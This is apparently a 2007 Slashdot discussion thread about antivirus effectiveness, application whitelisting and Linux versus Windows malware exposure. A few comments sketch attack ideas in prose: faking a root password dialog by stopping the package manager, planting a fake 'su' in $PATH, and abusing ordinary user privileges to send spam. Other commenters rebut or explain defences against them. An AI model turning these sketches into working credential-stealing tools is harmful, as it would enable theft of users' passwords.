As for me, leaving aside the matter I'm mostly running Linux and OS X, I can't look at any AV companies in my area: there are none.
The market would be too small and way too cheap.
And among all the spam I get -- and since I don't hide my e-mail address, I get tons of it (helping Google evolve spam detection algorithms) -- I have yet to see a phishing mail spoofing a Croatian bank.
We mostly get threats that are a bit more global.

I do find the idea of whitelisting software intriguing, and definitely worth considering among business users at the very least.

User awareness is key

The main reason for virus infections, as far as I can see, is because of people simply executing untrusted programs: downloading rubbish toolbars, screen savers and opening e-mail attachments which say "Pam Anderson Naked.exe". I think more "sophisticated" means of infection, such as buffer-overflows or browser bugs are relatively less prevalent than the simple act of directly executing a trojan program and infecting yourself (not that I have statistics to back me up).

Personally, I don't use an anti-virus product (at least, I don't have one running continously, bogging the system down). My protection mechanism is to simply not run programs I don't trust and also have the latest updates installed. In the rare event that I do need to run an untrusted executable, I run a manual scan on it.

After giving up the temptation to run these rubbish programs, I haven't been infected by a virus in years.

Virus?

[hax0r_this]

Are viruses really still a big deal? My impression for the last few years has been that even windows has gotten to the point where you basically have to grant a virus permission at some point along the line. I haven't used an anti virus in years and to my knowledge my windows installations are all clean (I do check them periodically with that Trend Micro online scanner dealie).

Re:Virus?

[Barny]

Yeah, now that world + dog uses a NAT router for their broadband and the lack of kazaa, virus' and worms are a dieing breed. We swapped them for intrusive spyware and identity theft-ware that is much harder to get rid of and, thanks to the wonders of social engineering, much harder to stop joe-sixpack from getting :/

Re:Virus?

[ConceptJunkie]

If you're using Vista, that's probably true, but after the first thousand times, giving a program permission to run becomes a reflex and no one will pay attention to it any more, and the one thing Microsoft actually seems to have accomplished with Vista, improved security, becomes moot. Thanks, Microsoft, you managed to invest about as much time and energy into Vista as the entire Apollo program and have nothing to show for it.

Re:Virus?

[jonbryce]

Yes, but given that you need to give the computer permission to delete a desktop icon (if it is in the "all users" folder), most users will just grant permission whenever it is requested.

Re:Virus?

[dave562]

Sadly they are. I'm running a fully patched XP box with IE7 as my browser and I almost got hit with a virus earlier this week. I went to a website that I visit all the time and it was compromised. It loaded a malicious script that popped up one of those annoying windows, "Your computer is infected with malware, do you want to clean it? Yes/Cancel." At that point I knew things were already bad so I opened Process Explorer and killed the IE process. Simply killing the process dropped a trojan downloader into my IE temp directory. Symantec AV caught the downloader at that point. If I hadn't had AV on the box it would be owned right now.

Re:I don't have to worry about viruses on the web

[Valdrax]

Still get RSI though.

That's 'cause you got arrogant and didn't properly firewall your hand before connecting it to the net.

Consider Application and Device White-listing

Increasingly I'm recommending Application White-listing as a way to lift oneself out of the never-ending struggle against viruses and malware. Now there are several companies offering solutions to the problem (personal favorite is Trinamo). It wont suit every company or user since it requires an IT security function with some power and an understanding user community, but white-listing is more and more becoming an accepted method for dealing with some of ITs unsolved problems.

AG

F-Secure Deepguard 2.0

[Dtyst]

I'm not surprised that F-secure did so well in behavioural blocking test, F-Secure Deepguard is amazing in recognizing malware application behavior even if it's not a know virus. Truly a nice advancement in virus prevention. Let's hope the competition gets as good as well.

Antivirus is just bandaid.

[miffo.swe]

The real problem is that its possible to just click on random stuff from mail, on the web and in IM clients and it gets installed. Because its such a big source of malware it shouldnt be done at all really. Many malware uses defects in browsers and OS and Antivirus is not a solution at all to those problems. Its not even bandaid then.

What i would like to see is Microsoft shipping a Windows version thats fairly secure out of the box. Then and only then Antivirus becomes something useful as a second added security layer. As it is now when it is the only security layer it doesnt work. Shipping Antivirus with Windows as Microsoft does is not a good solution but rather a recognition that they are not capable of delivering a fairly secure OS at all.

If users gets infected a lot by clicking the wrong things the sane thing would be to disable that function or atleast make it more safe. Like demand for example that a site that installs software is trusted by a third party.

Re:Antivirus is just bandaid.

[cdrguru]

How do you make a computer that is administered by a fool (er, a user) "fairly secure?" It cannot possibly be secure because the administrator does not know what should be done and what should not be done.

When they click on Weatherbug to install it because they think this is something they want, who is there to tell them they cannot do this? They want to install new and cool software on their computer. Preventing them from doing this is the only path to security there is - if you allow them to install Weatherbug, they can install anything, including trojans and malware.

Sorry, for 99% of the people using computers they do not need or want a computer - they want an appliance that serves up entertainment and email. Nothing more.

Re:Antivirus is just bandaid.

[toddestan]

What i would like to see is Microsoft shipping a Windows version thats fairly secure out of the box. Then and only then Antivirus becomes something useful as a second added security layer. As it is now when it is the only security layer it doesnt work. Shipping Antivirus with Windows as Microsoft does is not a good solution but rather a recognition that they are not capable of delivering a fairly secure OS at all.

Where have you been for the past year? Microsoft has been shipping a version of Windows that's fairly secure out of the box. It's called Vista. You may argue that the implementation may suck in the sense that it annoys the user, but it's basically doing the same thing that other OSes do.

read Ranum on enumerating badness ..

[rs232]

Why are we still talking about this in late 2007. What have the supreme innovators being doing the past decade. Ranum laid out the solution here:

"if I were to simply track the 30 pieces of Goodness on my machine, and allow nothing else to run, I would have simultaneously solved the following problems":

* Spyware
* Viruses
* Remote Control Trojans
* Exploits that involve executing pre-installed code that you don't use regularly

Re:read Ranum on enumerating badness ..

[QuantumG]

Blah, the real solution is to have open software that you can trust because everyone knows you could look inside it so they don't try to sneak something past. If you can't have that, at least run every program in a separate virtual machine and only allow a program access to the documents it requires to have access to instead of giving it full control to do anything on the system, including modifying the kernel, which is what 99% of Windows users do.

Re:read Ranum on enumerating badness ..

[darthflo]

Open software is fine and all, but would you mind finally giving up the "I can look inside, so it's secure" bull?
In theory it works, but it's not practically employable. Most mainstream distros install binary packages. Even if source packages are available, did you check each and every changed line after each and every security update? Simple answer: Either you don't or your software's very outdated and thus probably vulnerable.
Even given the benefit of the doubt (imagining you've got a whole team of people following the development process of every single program you use, closely monitoring each and every code check-in and the state of your respective distro's packages) your solution's not as secure as it may seem. Remember SquirrelMail?

Re:read Ranum on enumerating badness ..

[QuantumG]

Meh, people can so you'll be leaving your big fat paw prints on it if you try. See, that's the cool bit. I can say "on line 2105 of blah.c in package foo version 4.321 I found that some fucker had tried to put in a backdoor.. can you guys check your revision control to see where this came from?" and there's this public audit trail. If I managed to find something in a binary that isn't in the source I can easily find out who made the package and where they got the binaries from. That's what security is.. it's people and accountability.

Re:read Ranum on enumerating badness ..

[Ephemeriis]

if I were to simply track the 30 pieces of Goodness on my machine, and allow nothing else to run

That is actually relatively do-able with group policies under Windows. You can create a list of things that you trust for execution and block just about everything else. If you had a fairly large IT department with the time and inclination to check every single executable component that users need this might actually be enough. The part where it all falls apart is the updates...

Windows Updates aren't always terribly well documented. Some files get updated that you aren't told about, and suddenly something won't execute. Then you've got updates for all the other pieces of software that your users run... And you can't ignore all the updates because some of them are genuinely necessary. So you wind up having to dedicate an awful lot of time and effort to simply allowing your users to run what they need to.

I tried such a draconian policy at home with my son's computer... It worked fine for about a month, and then I got sick of constantly adding new things to the trusted list. I have since gone to a more relaxed group policy and installed some decent antivirus on his machine. The combination has worked quite well.

Re:read Ranum on enumerating badness ..

[cdrguru]

The only way to correctly use open software is for the person using it to personally examine the code. What? The user can't understand C++? Well, they have no business using open software then if they can't personally check it out.

This is a little harsh, but the problem is that if a user installs a binary package without checking it they are leaving themselves open to whatever the distributor allowed in. Distributors get compromised. Sure, this is eventually detected and some forum somewhere has 1,500 posts about it. But that does not mean that ever user that downloaded it, trusted it and installed it gets informed.

If you can't check it and do not know the history of what you are downloading, you shouldn't be downloading it.

Same goes for any unsigned binary. If you can't go back to the publisher/author and know, absolutely, they are solely responsible for the binary you are using you cannot trust it. Unsigned code is untrustworthy. Period.

Re:read Ranum on enumerating badness ..

[cdrguru]

Sure, you might be able to track something back. Can the other 1,000 people that downloaded a compromised binary? I doubt it. Are you going to tell them? No, you might post it somewhere in some forum or blog but how to the other "users" know about this?

Reading Slashdot?

Re:read Ranum on enumerating badness ..

[QuantumG]

Are you stupid or what? The distro just sends out another package.

solution for real protection ..

[rs232]

Use a Linux desktop distro, disable exec on the /home and /tmp directories, don't allow users to install software, case closed ..

Yes, I know what you're going to say, there aren't any Linux viruses because there aren't many Linux desktops out there. But where are all the server exploits out there being actively used in the wild. I'm talking about commercial servers being hacked not some msging board ..

Re:solution for real protection ..

[QuantumG]

If you honestly think that servers don't get hacked then you probably should go talk to a security sysadmin or two.

The trade in zero day exploits is alive and well.. the only difference between today and 10 years ago is that the sale of zero day exploits has become slightly more legitimized. i.e., the "good guys" will now buy an zero day exploit off anyone selling, not just the "bad guys".

But getting back to the topic, you don't need exploits to write a virus. What you need is an infection vector, the user will do the rest. Thankfully, Linux users don't tend to download "warez" or open executable email attachments or even have software that requires you to install a "plugin" before you can view porn. What you said about disabling exec on /home and /tmp is a good way to remove those first two infection vectors. It's even practical - if you have virtualization software installed on the machine. Someone complains they can't run random shit they downloaded or the internet? (or wrote themselves) Tell them to run it in a virtual machine.

Re:solution for real protection ..

[darthflo]

Use Windows, only allow the programs* needed to be run (via GPO), case closed ..

* An execution white- or blacklist can be created with hashes or executable file names. Obviously don't use the latter possibility.

Re:solution for real protection ..

[rs232]

"If you honestly think that servers don't get hacked then you probably should go talk to a security sysadmin or two"

Can I have some real world examples, not some home box, but commercial servers being hacked and customer records stolen, like the TJ Maxx case ..

Re:solution for real protection ..

[QuantumG]

Dude, it happens every day. That's why it isn't news. As I said, go talk to a security sysadmin or two.

Re:solution for real protection ..

[SCHecklerX]

Yes, I know what you're going to say, there aren't any Linux viruses because there aren't many Linux desktops out there. But where are all the server exploits out there being actively used in the wild. I'm talking about commercial servers being hacked not some msging board ..

It happens all the time. Usually through unpatched software, or misconfigured apache servers. The security team responsible for the DMZ network and firewall rules usually has no power over the guys who administer and program the systems.

Re:solution for real protection ..

[rs232]

"Dude, it happens every day. That's why it isn't news. As I said, go talk to a security sysadmin or two"

In other words no, you can't produce any real word examples, dude ..

Re:solution for real protection ..

[QuantumG]

So just so I have your logic straight:

1. You think something that isn't remarkable is newsworthy.
2. There are few if any news stories about it.
3. Therefore it doesn't happen.

You're an idiot.

I can give you real world examples, but as they are in the form "my mate who is a security sysadmin tells me..." I honestly think you'll appreciate them more if you go talk to your mates who are security sysadmins.

Re:solution for real protection ..

I'm a sysadmin and every company I've worked at has had at least one of their linux server hacked. I myself have had to deal with a variety of breakins over the 10 years I've done linux.

Linux gets hacked. Sorry if the truth hurts.

Oh, I wouldn't need any of that,

[laejoh]

I run Linux!

where are all the Linux server exploits ..

[rs232]

"The reason that Linux is largely unaffected is that it is not very widely used .. If/when we succeed in bringing Linux to the masses, this layer of protection will be torn away"

If that were true, where are all the Linux server exploits being actively being used it the wild. A Linux desktop logged in as standard user is safe from the numpties and is still usable. The dangers of screensavers wouldn't even apply here; even if a user managed to run some malware script it would most probably be confined to the users home dir, the core system would remain immune.

Re:yeah, but.. (Score:5, Interesting)

Re:where are all the Linux server exploits ..

[keesh]

Normal users on a Unix system have more than enough privileges to send out a million emails a day.

Re:where are all the Linux server exploits ..

[jimicus]

Oh, there's plenty of Linux server exploits. Most depend on specific applications (eg. bind, sendmail), misconfigurations or both.

The other thing you have to look out for is web applications - which of course tend to be exploitable regardless of what OS is running the website. These are notorious for providing holes. If you're lucky, all that happens is your website is replaced with a single page which says "pwn3d! l053rz!".

If you're unlucky, you get to announce to the world that you've lost the credit card details of 20,000 people.

(This, by the way, is not drastically different from the current state of security in Windows Server. A careless administrator is probably the biggest security hole known to IT).

Re:where are all the Linux server exploits ..

[FireFury03]

If that were true, where are all the Linux server exploits being actively being used it the wild.

Linux server exploits _are_ being actively used in the wild. If you don't keep your server patched up then you stand a pretty good chance of being rootkitted. However, Linux distros tend to be pretty hot on security updates, meaning that a fully up to date system has very few known security holes. I suspect there are also more "idiot" server admins in charge of Windows servers than Linux servers (that is not to say that Windows admins are idiots, I just suspect there is a higher proportion of clued up admins in the Linux world).

However, the server world is very different from the desktop world - in the server world you can be relatively trustful that the admin won't go and install some random shiny new screensaver, etc. whereas on the desktop most people are not (and do not have access to) qualified admins.

A Linux desktop logged in as standard user is safe from the numpties and is still usable. The dangers of screensavers wouldn't even apply here; even if a user managed to run some malware script it would most probably be confined to the users home dir, the core system would remain immune.

There are a couple of important points here though:

1. Your average home user does _not_ have a dedicated sysadmin. When they want to install a package they (generally) need to become root to do it - that means that the numpties are equally capable of installing screensavers^Wmalware under Linux as they are under Windows. The thing the privilege separation gets you is that you can't _accidentally_ install something as root (e.g. via an exploit in your browser / mail client / whatever).

2. Even without root, a user still usually has plenty of permissions to do some evil things. They can't do some particularly bad things like SYN floods but they can still send out millions of emails and compromise other hosts.

3. Is the protection of the "core system" actually that important when you have a single user machine and so all the important data is owned by that user? The only thing this really gets you is the knowledge that your system binaries are probably safe (so you can trust that ps, netstat, etc are giving you accurate results rather than hiding the malware that is running).

There may be some merit in mounting all the filesystems the normal user can write to as "noexec" so that malware can't just install itself and run as the normal user. But this may place too much of a limit on usability and most distros certainly don't do this by default today.

Re:where are all the Linux server exploits ..

[cheater512]

Granted but its significantly easier to clean such infections (they cannot hide as easily), it only affects that one user on a multi user system and it cannot infect the core system.
If the user doesnt log in, then the malware cannot run.

Re:where are all the Linux server exploits ..

[JGJones]

the core system would remain immune - true...but for a typical home user - the core system is the least of their worries - they care more about their own files - photo collection etc etc. If there's a script that basically nuke their /home - they're not gonna say "gee that's OK as long as my core system is fine..." Granted most viruses are after zombie PC's etc, in this respect I agree.

Re:where are all the Linux server exploits ..

[Knuckles]

Well, they should have backups. I mean really, it's the same as the hd dying or something.

Re:where are all the Linux server exploits ..

[KDR_11k]

It's no major feat to trick a PEBKAC into running something as root.

Re:where are all the Linux server exploits ..

[Dr_Barnowl]

I don't think so.. on my MythTV box, I always run as root ; but the only time I log into it is to do sysadmin, so that's reasonable. It doesn't have a desktop environment, just a single application (MythTV) that runs on a bare X server.

It got up my nose slightly when I installed Ubuntu on my desktop and I needed to supply a password to perform admin tasks, and type "sudo" before admin commands in a terminal, but on the whole, it achieves the desired effect ; it makes you actually consider what you are doing before doing it.

I *do* habitually run Windows as Admin, because if you are a developer it's a pain in the arse not to. But I don't pick up malware of any kind because I don't download software from untrusted sources, use IE, or open unknown email attachments. Once in a while I install anti-malware and run it. And scan it from the Linux instance on the same box as well.

Will Linux newbie users infect their systems with huge amounts of malware? Well, I don't think so.

  * As people noted, there isn't a huge amount of desktop malware around NOW because the Windows target is so much bigger.
  * The vast majority of software installed on desktop distributions of Linux is done using a package manager. Any package manager worth it's salt will be operating out of a reputable source, with checksum verification.
  * The vast majority of software that the average user uses has an equivalent in the official package repositories.

On the other hand, nothing is foolproof and there an awful lot of fools out there, like my sister in law who infected her machine with 427 nasties by believing things she saw in IE.

Re:where are all the Linux server exploits ..

[GreggBz]

A user compromise on a Linux system would provide suitable functionality for today's typical malware.

On my defualt, fully security patched Mandriva workstation:

- I have full read write execute permission to my home directory.
- I can run wget to download anything, and put it as an executable anywhere in my home directory.
- I can use perl, awk, whois, grep, sed, whatever, to craft some pretty nasty scripts.
- I can use telnet and I could write an expect script to send spam with telnet.
- Or, I could just download a precrafted elf binary to run as a mini-mail server in my home directory.
- It's not to hard to imagine that I could pop something in /tmp or elsewhere that would persist on the system even after the user had been deleted.
- I could fire off a fork bomb that will crash the system instantly.

I does not take to much imagination to figure out some suitably bad stuff that you could do as any old user.

Of course, hiding yourself on the system and ensuring your survival could be difficult. It would be easy to find all the nasty services running as said user, since top, ps, etc.. would not have been compromised.

Re:where are all the Linux server exploits ..

[baadger]

If you can tell me a way to cheaply and conveniently backup my /home, which is approximately 1 TB in size, please do so.

Re:where are all the Linux server exploits ..

[hoopshank]

"The reason that Linux is largely unaffected is that it is not very widely used .. If/when we succeed in bringing Linux to the masses, this layer of protection will be torn away"

I'm sure part of the reason Windows is attacked is not just because it's so widespread but because it's produced by Microsoft who have shown some pretty dodgy business practices over the years. I hope that most hackers (other than the significant number who make money through malware, etc) are kind of revolutionary or, like myself, wish the wealth could be more evenly distributed. I think most hackers aren't just in it to piss people off. If Linux ever dominates the OS market, there will still be thieves but I would hope there would be fewer hackers just trying to piss off users because they use that particular OS.

Re:where are all the Linux server exploits ..

[DaveWick79]

Buy a 1TB external disk for under $300. Or a couple of 500GB drives, which will be cheaper.

You've really got no excuse for not doing backups, it's going to cost you a heck of alot more to recover that data if you don't have the backup.

Re:where are all the Linux server exploits ..

[BlakLanner]

Something like this?

http://www.newegg.com/Product/Product.aspx?Item=N82E16822136100

Re:where are all the Linux server exploits ..

[cHiphead]

The bane of IT departments everywhere..

Cheap, Convenient, or Reliable, you only get to pick one.

Cheers.

Re:where are all the Linux server exploits ..

[Knuckles]

I didn't say it's always siple or cheap. But a harddrive failure can still wipe it out just like malware can, so you need to have a backup anyway if you want to be safe.

Re:where are all the Linux server exploits ..

[IamTheRealMike]

Of course, hiding yourself on the system and ensuring your survival could be difficult.

It's easy. Poll /proc looking for Synaptic/Ubuntu Update or whatever the GUI package manager wrapper de jour is, and when you see it being started, send SIGSTOP and open up a clone of the systems "Enter your admin password" dialog box. Wait for the user to enter the root password and away you go, rootkits ahoy. Windows has some mechanisms to try and defend against this, I've yet to see a Linux distro that does.

Re:where are all the Linux server exploits ..

[Lennie]

If you look at the amount of spam trying to bypass spam-filtering systems, I think the hackers you talk about are some where in the past. These people are just in for the money.

Re:where are all the Linux server exploits ..

[Todd+Knarr]

Won't work. The package manager is running as root, the polling program looking to fake the dialog will be running as your regular user account. Trying to SIGSTOP (or send any other signal to) a process running as a different user will get anyone but root an EPERM error. Likewise trying to use the X facilities to kill the window: you don't have permission to do that to some other user's windows.

This is where the Unix heritage shows compared to the Windows heritage. Windows grew up as a single-user OS, everything running on the box belonged to the same person. Unix grew up with multiple users always logged in, and the requirement from day 1 that it prevent them from messing with each other.

Re:where are all the Linux server exploits ..

[Non-Huffable+Kitten]

Interesting. What about running su in a terminal emulator (say konsole) running as my user? Can that be intercepted by user-privilege malware?

Re:where are all the Linux server exploits ..

[Todd+Knarr]

If the malware can place a binary named "su" in a directory that's in your $PATH before the directory containing the real su program, then yes it can. Of course there's several ways to prevent that from working. The most convenient one in a GUI environment is to use a "root console" icon that doesn't use su but a special SUID wrapper program located in a system directory and uses absolute paths for the executables involved so that $PATH-variable poisoning can't affect which binaries get run. Another one is to place any home-directory-tree additions at the tail end of $PATH so system binaries can't be overridden without changing $PATH in your current environment (alterations in a running program's environment don't propagate back up to the shell's environment, which makes it very difficult for any program other than your shell itself to change your shell's working $PATH).

Note that even if su gets hijacked, you'll notice because either you'll be prompted for the password a second time or you won't get root privileges. And the root password is in general not useful to an outsider. Programs like su that prompt for the root password do their input through the terminal, not through the standard input/output streams, making it very difficult for the malware to stuff the password into the input programmatically, and almost all remote-access services in Unix won't allow root to connect remotely even with the correct password (note that "remotely" in this case includes connections to the machine's own IP addresses including 127.0.0.1).

None of this is accident. The "plant a password-stealing binary somewhere in your victim's $PATH using the same name as a program he regularly uses" trick is ancient, at least 30-35 years old on Unix, and Steps Were Taken after the first spate of pranks based on it.

It's time to lock auto-run

[Krneki]

Bloatware, spyware, viruses, .... For me they are all the same in the end they slow down your work. I like Linux repositories, because those packages aren't controlled by sales department. Each time I install a program on windows I have to run HiJackThis.exe to check it didn't put itself in the auto-run. The same is valid for 99% viruses, they use auto-run "features" to enable them to run each time you start your OS or application.

Heuristics in "easily defeated" shock

[Cheesey]

The funny thing is that AV software has been almost totally useless ever since we moved from floppy disks to Net connections - long before they started whitelisting malware from major corporations. As soon as it became possible to distribute malware more quickly than AV updates, AV software was dead in the water. And even before then, the writing was on the wall: the problem of detecting a virus is undecidable and you can't change the laws of math.

Good luck convincing your boss that AV software is snake-oil though. Best carry on paying and taking a performance hit every time you open a file.

Re:Heuristics in "easily defeated" shock

[kongit]

I wouldn't say it is pointless. However, overusing an AV is pointless. Scanning a file every time it is accessed is pointless, as it should of been checked before it was allowed permanently on the machine. If that file has not been modified since the last AV check it should not be scanned. Additionally scanning files you create is rather pointless because if you are putting a virus in your files either a) you know what you are doing or b) you have another virus or trojan somewhere else putting that virus in your file so any action on the created file would not fix the problem. There are many viruses out in the wild and most AV software can check for many of them. Not only are new viruses a threat but older ones can still cause large problems. So AV software does have a place in modern computing, but many developers of AV software make it do more then it needs to and use way too much overhead and time to do it.

Using the internet is like sex. The only way to completely avoid viruses is abstinence. It is almost always safe if you do it with somebody you know to be safe like a spouse. If you are dealing with the unknown or unreliable, protection is your best bet. While AV software isn't as reliable as a condom (which isn't 100% reliable) it is better then nothing.

Re:Heuristics in "easily defeated" shock

[Opportunist]

Take that tin foil hat off for a moment to vent some hot air, please.

Could you first of all please inform us what has been whitelisted? Aside of copy protection mechanisms (which should be classified malware, but guess what: PEOPLE WANT TO BE ABLE TO PLAY THEIR GAMES!), I'm not aware of any whitelisting taking place. At least in the more reputable companies in the biz.

Second, yes, with networking it's easy to distribute malware quickly. But the other way around is true too, AV vendors get new samples much more quickly, too. What is true is that the spreading cycle changed from a few months to a few hours, but so did the detection and prevention systems. It is no longer an issue to push a critical update to your client in time. Of course, if your customer insists in updating once a week, he's underprotected. But that's not the AV manufacturer's fault.

The paper you quote is well known in AV circles. I have a copy of it hanging on my wall. Yes, I have a fairly twisted sense of humor. Mostly, I enjoy to see that something doesn't instantly become truth just because you wrap it up in formulas so people have a hard time understanding it. But it's math, so it's proven, so it has to be right. I give you that much that heuristics cannot detect a virus flawlessly. That has never been the aim nor has anyone (reputable) ever claimed it is. When you talk about snake oil, talk about those virus vendors that claim their heuristics can catch anything there is out there. It cannot, and it never will be able to.

The virus-antivirus battle is an arms race, nothing more, nothing less. "Evolving" and "morphing" viruses are a tiny minority, mostly consisting of POC and "look, I can do it!" projects. The main threat today are commercially created malware kits targeting you to get you as a spamming platform or to steal your ID to harvest you for money. Creating a morphing trojan is far too expensive when a non-morphing can do the job just fine. This might change, but so far there is simply no reason to change anything. Virus writing has become a business, not more, not less. It's a matter of investment and return thereof.

So please, before jumping to conclusions, just take a look at the whole picture. Yes, it's impossible to determine whether something is a virus or not by "just looking" at it. But that doesn't mean AV tools are pointless. It means heuristics are.

Re:Heuristics in "easily defeated" shock

[SCHecklerX]

The problem that AV tries to 'solve' is simply a user behavior problem. Bad approach, and it obviously doesn't work. Worse, the AV software does what I would personally consider bad things on the systems it runs on: killing IO, potentially corrupting files that are being written, eating cpu cycles, etc.

Yes, I understand that attempts at education aren't working either. Most people are screwed either way. I deal with it by not supporting anybody who won't take the time and effort to learn how to properly use their tools (the computer in this case).

Re:Heuristics in "easily defeated" shock

[Opportunist]

The problem is that those people are not only a problem for themselves. Actually, more often than not, they're more a problem for others than themselves.

If they could only trash their own machine, then I'd find me another (most likely better paying) job, maybe as a security guy with one of our online casinos. You trashed your computer due to your own stupidity? Good! Means you're off the net and, hell, let Darwin be right, who's not fit to live will die, who's too stupid for a computer doesn't deserve one.

Those people are a threat to others, though. People who do care about security, who do keep their machines well patched and still, those insecure slobs are a threat or at the very least a nuisance. They keep hammering your firewall with worms, they flood your inbox with spam and most intimidating, they can be used in a massive DDoS storm to blow you, the secure guy, out of the net.

I'm well aware that AV kits aren't the solution to user stupidity. They're at best a band aid. Unfortunately, it's about the maximum of what level of care you'll find in those that don't know anything or care about their computer's security: That they might install one of those AV kits.

welcome to the modern ages ...

[freaker_TuC]

... where you can whistle in 1200 baud and more over the phone ...

The kind of targets

[_merlin]

I disagree. I think the reason there are fewer pieces of malware floating around for Linux is because of the kind of roles Linux machines typically serve in. Most Linux machines are servers or enterprise workstations. In the case of a server, there will be a system administrator who is responsible for configuring the server, locking it down, and keeping it up. Chances are, they'll notice malware pretty quickly, and do something about it. Enterprise workstations aren't an attractive target, either: they're usually either a shared machine that's locked down hard, and under the eye of a sysadmin, or they're the pet of a tech-savvy user who wants his box in top condition so s/he can get stuff done.

Malware is all about money these days, whether it's herding bots so you can sell spamming services, or getting paid to DDoS someone's competitor, sniffing credit card numbers to buy stuff, or sniffing personal details for identity theft. Remember that your attack isn't 100% reliable, so you want as many potential targets as possible, and you want to attack weak targets so as to get the highest possible success rate. All so you can make as much money as possible, of course.

And what's the best target? Home Windows PCs, of course. No vigilant sysadmin monitoring the system; average Joe user doesn't grasp the concept of locking his box down, let alone have the m4d skillz to do it; Joe doesn't install patches regularly because he sees the downloads and restarts as nothing more than an annoyance; Joe doesn't really understand his computer, so he doesn't know how to look for the telltale signs of malware; Joe doesn't understand that he has to keep his virus scanner's definitions up to date, and turned off the annoying prompts; Joe doesn't understand a firewall, so he just clicks "Allow" to get rid of the warning message; the list goes on forever...

Now that MacOSX is becoming more popular, we're seeing a bit of malware for it, too. Example, that thing that claimed to be a video codec, but was really a DNS redirector. Now this one is a very good example of how malware authors target uninformed users: in the standard OSX installer program, there is an option to show the files that will be installed; if you or I (as /. geeks) looked at the files that this "codec" was installing, we would see that it couldn't be a real codec at all, and we could cancel the install; but an uninformed user won't know to look at file listings, and won't know what looks right, and what doesn't. It wasn't a failing of the OS: it was a valid installer package that prompted for authorisation to run; it was all about users who don't know how to administer a system.

Until Linux is popular in the hands of inexperienced, non-tech-savvy home users (as opposed to enterprise), it won't be an attractive target for malware authors, and we won't see its security put to the test. When it does become popular, I expect we will see Linux malware, and I expect it will be like OSX malware, in that it relies on failings of the user, rather than the system itself.

For the record, I use OSX and Solaris at home, and develop for whatever I'm paid to develop for at work (which was, until recently, Windows, Linux, Solaris and OSX - looks like it will be just Solaris soon).

Re:The kind of targets

[arminw]

..... in that it relies on failings of the user, rather than the system itself..........

Most users, will give the password if prompted. We mitigate these user failings here by not letting them know the administrator password. Then if they want to install something that asks for this, they are stuck. This works poorly for Windows because there are still many legit programs that will not work unless the user has admin rights over the whole system.

Mac users have no real reason to know the system password for everyday use. Of course malware can still run in user space and possibly get around such protections. It does make it a lot harder for the virus writers if they cannot simply social engineer their way into the heart of the OS. Most of the malware authors assume that they can trick users into installing anything at all on the system.

This is a bit more work for us, if users do have install something that requires the admin password, but cleaning crap software out of computers is even more work.

Re:The kind of targets

[heinousjay]

Mac users have no real reason to know the system password for everyday use

Sure they do, they generally have to administer their own box.

There could be a few bucks in doing a remote admin service for home users who have neither the skills nor the inclination to use them. I'd google to see if someone does that already, but I'm feeling lazy.

Re:The kind of targets

[gzipped_tar]

Surely the weakest part is between the chair and the keybord.

A search on secunia tells a story of an old Linux virus (or rather, a piece of malware). The virus comes from a phishing mail in C sourcecode. Unless the luser has root privilege and is nuts, nothing could happen at all.

Consider one day M$ is dead and every luser in the corner of the world runs a Linux desktop. Then the luser happily su and make install, without even a single glance at the sourcecode.

There are just too many false positives

[someone1234]

AVG for example shows nwn2main.exe (Neverwinter Nights 2 from Obsidian) as false positive.
Sure, it is partly because of the inane copy protection, but AVG should make some tests before issuing such a crap.

Luckily the 'infected exe' is recoverable, and after disabling the resident shield it will run. But then, why do you have AV in the first place?

Re:There are just too many false positives

[Opportunist]

Sorry, but it's not easy for AVG to take care of that. There are billions of programs out there, many using calls and features the average malware will use, too. Self modification, installation of drivers, calling drivers in more than just a little strange ways, debugger and tracer detection routines and so on.

In short, copy protection mechanisms share a fair lot of features with malware. It is often not easy to discriminate between them.

Now, it's likely that AVG didn't have access to NWN2 to ensure their routine won't find it. If anything, I'd complain about a program behaving like a trojan, not about an AV tool finding something they didn't know about.

Last years was better?

[Oktober+Sunset]

So what I need to do is uninstall my current anti virus and install one from last year, and not update it to the new less effective version from this year?

Re:Last years was better?

[Opportunist]

I'm aware that you're joking, but I honestly fear that others would come to that conclusion without joking, unaware that malware isn't a static field, set in stone and never evolving. Those are essentially the same people complaining that they bought an AV scanner 3 years ago, never updated it, and now it won't find a thing.

Re:Last years was better?

[Oktober+Sunset]

wait, if it won't find a thing, then surely their computer is free from viruses, that process "fuckallyourshitupandstealyourbankdetails.exe" must be totally normal.

Useless

[Jessta]

Antivirus has always been useless. It's not proper security.
Imagine having a door man that has a list of everyone you hate and everyone on that list is not allowed in your house. An enemy is prevented access but a stranger can still walk away with your TV. Wouldn't it be better to give the door man a list of all your friends instead.

Blacklisting is a really bad way to prevent unwanted activity. Whitelisting is much better.

Re:Useless

[ledow]

The trouble with antivirus is that the doorman is actually sitting upstairs with a note on the front door that says "Report to the doorman upstairs, please." By the time AV spots a virus it's usually already far too late and the first thing that any virus does is to turn off AV, usually in such a way that the user doesn't notice (the equivalent of swapping your doorman for a clone).

AV is good only as a system check. It is no good as a frontline defence. It can't spot viruses until they are either already in memory or sitting on your disk. Some of the time it will spot them before they get executed but most of the time not. When I used to use Windows at home (I only use it on school networks now, I work as a tech in schools) the one way to "tell" that you had something dodgy going on was when Zonealarm went ape. Even the integrated Zonealarm Security Suite, AVG etc. didn't detect the stuff that I was testing. But when something starts asking for Internet access out-of-turn, you know something's wrong. And when your AV is less use than a freeware firewall that bothered to ask you, you know it's a waste of time.

AV-scanning-proxies : excellent idea
AV scans of networks: good idea
AV scans of home machines: pointless and doesn't tell you what you can't find out in ten seconds of using the machine as an IT professional.
AV "real-time scanners": Well, yes, if you must, have CPU to spare and ignorant users using the machine. Otherwise, they're pointless.

Re:Useless

[Opportunist]

That's how most firewall tools work. What do you think would happen when something like this becomes the norm in the AV world?

A firewall only cares about programs that try to create connections to the outside world. And even though it doesn't really seem that way, those programs are a tiny minority of the things running in your machine. Still, if you ever used some firewall software, you'll quickly notice that as soon as some part of your OS gets updated, it starts to puke, scream and pop up every few seconds to minutes, complaining that something changed and that you didn't inform it about that.

Now imagine this happening hundredfold. Do you REALLY think that would increase your productivity? If you thought Vista's "allow-deny" nagging was horrible, you ain't seen nothing yet.

Re:Useless

[FredFredrickson]

It can't spot viruses until they are either already in memory or sitting on your disk. Not really. AV protection programs can certainly tell if there's an active infection on your machine. The major problem with AV software is that when it's in memory, AV software is particularly bad at removing it. (Try deleting a file that's in memory. Can't do it? Try closing the program, then deleting? Oh, works now!)

